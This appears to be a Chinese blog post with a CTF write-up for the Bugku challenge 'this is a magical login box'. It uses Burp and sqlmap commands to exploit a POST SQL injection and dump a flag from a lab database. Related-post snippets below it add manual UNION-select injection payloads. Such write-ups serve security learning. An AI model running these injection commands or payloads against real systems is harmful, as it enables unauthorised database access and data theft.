bugku-这是一个神奇的登陆框

最新推荐文章于 2019-09-30 15:24:24 发布
最新推荐文章于 2019-09-30 15:24:24 发布
阅读量536 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangker12148/article/details/90672747
版权

打开http://123.206.87.240:9001/sql/后是个登陆界面
在这里插入图片描述
查看源代码
在这里插入图片描述
于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包
命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名
在这里插入图片描述
后续在保表、列以及数据
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 --tables//爆表名
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1 -T flag1 --columns// 爆列名字
命令sqlmap.py -r 1.txt -p admin_name -D bugkusql1-T flag1 -C flag1 --dump//爆flag
在这里插入图片描述
在这里插入图片描述
最后得到flag!!!

ker宝
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
爬虫笔记-Bugku秋名山老司机(入门)
12-21
题目:bugku-秋名山老司机 题目要求:两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动 如: 多刷新几次可见题目提示,需要用post传入值,变量名为value 创建py文件,导入 requests 库和 re 库 并且创建...
bugku 这是一个神奇的登录
Superpig的博客
11-19 3314
步骤 1、打开题目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&admin_passwd=1&submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&admin_passwd=1&submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
bugku----这是一个神奇登陆
weixin_43803070的博客
07-07 507
此题是sqlmap+burp结合完成的,打开一看是一个登陆架,url显示sql,想必是post型的sql注入。 查看注入点: 首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码): root@kali:~# sqlmap -r '/root/桌面/2.txt' -p admin_name --dbs// -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了a...
bugku-Web这是一个神奇登陆(sqlmap+bp)
Sea_Sand息禅
12-12 977
根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。 首先输入用户密码来登录用bp抓包: 如图将其保存到txt文件中,然后用SQLmap来注入 输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了) -p为注入点,就是admin_name ;r为读文件 会发...
BugkuCTF 这是一个神奇登陆
3tu6b0rn的博客
05-15 342
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
bugku-这是一个神奇登陆(附代码)(详细)
偷一个月亮
06-20 891
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击架.zip
09-30
在【YML-AWD-FRAME-FOR-BUGKU-master】这个主目录下,我们可以找到整个架的源代码、配置文件和其他相关资源。 1. **架结构**:架通常包含以下几个关键部分: - **核心引擎**:执行自动化攻击的主程序,负责...
Bugku-AWD专版用于AWD比赛中的自动化攻击架源码+项目说明.zip
最新发布
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习...Bugku-AWD专版用于AWD比赛中的自动化攻击架源码+项目说明.zip
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku 一个神奇登陆--POST型SQL注入
a1004070060的博客
06-29 795
解题链接:http://123.206.87.240:9001/sql/ 解题过程: 本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应...
这是一个神奇的登录Bugku-web题 使用sqlmap注入实例)
热门推荐
Risker
03-14 1万+
正在学习sqlmap,拿这个题先入门一下。题目链接:http://120.24.86.145:9001/sql/先看下源代码:是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)我保存到了D盘的1.txt里。然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" ...
BugkuCTF之web题之这是一个神奇登陆
A_dmin的博客
12-09 9986
BugkuCTF之web题之这是一个神奇登陆 打开网页之后发现: 随便输入账号和密码出现: 那就开始寻找注入点吧,输入0’发现还是: 输入0" 发现报错: 确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现: 说明有两列。 输入 0" union select database(),2# ,得到库名: 继续输入 0" union select table_na...
bugkuCTF Writeup (Web)41-44
Troublor的博客
02-07 1866
这是一个神奇登陆 登陆注入 之前注入的分隔符都用的是单引号‘,这道题特立独行用的是双引号。 又发现有报错的回显,于是报错注入: 一开始使用的updatexml和extractvalue这两个函数来进行的报错注入,后来发现这两个函数的报错注入有缺陷,报错信息的长度不超过32位,对于这道题来说,flag是一个md5摘要,长度正好32位,而又会用到concat函数来连接,就会显示不
Bugku-web题,ctf模拟题sql注入神奇登陆
嘟的博客
09-30 1554
title: Bugku-web题,ctf模拟题sql注入神奇登陆 tags: web破解 categories: 渗透测试 这是Bugku-web题,地址为http://123.206.87.240:9001/sql/ 登陆网站,打开burp进行截断,账号密码随便打,burp截取后进行保存。 使用sqlmap自动注入,可以发现数据库版本,数据库名 使用sqlmap自动注入,发现表...
bugku-告诉你个秘密
qq_42812036的博客
04-04 956
点这里思路讲的很清楚了… 不过还是要有所总结的,虽说做的不多吧,但也有一丢丢发现。比如从题目名字来看 人名为题目的 托马斯.杰斐逊, 谁知道他曾是总统?,多少人知道他还发明了转轮加密。。 百度搜名字 弹出来的前几都是有他名字为关键字的解题wp。。。 我的天 到底是什么让他出名 本题就更是了,还和键盘连上关系。晕(((φ(◎ロ◎;)φ))) ...
bugku 这是神奇登陆
wssmiss的博客
07-23 157
题目 链接:http://123.206.87.240:9001/sql/ 输入admin ,admin 没有回显。 根据url的提示很明显是一个sql注入。 用burpsuit抓包,放到sqlmap里跑一下看看 右键保存至桌面为“1.txt” 打开sqlmap,输入指令 sqlmap -r "1.txt" -p admin_name --dbs -r 表示读文件 。-p为指定参数 --db...
bugku-多次 (详细)
偷一个月亮
06-20 1855
一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
bugku chatgpt-1
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值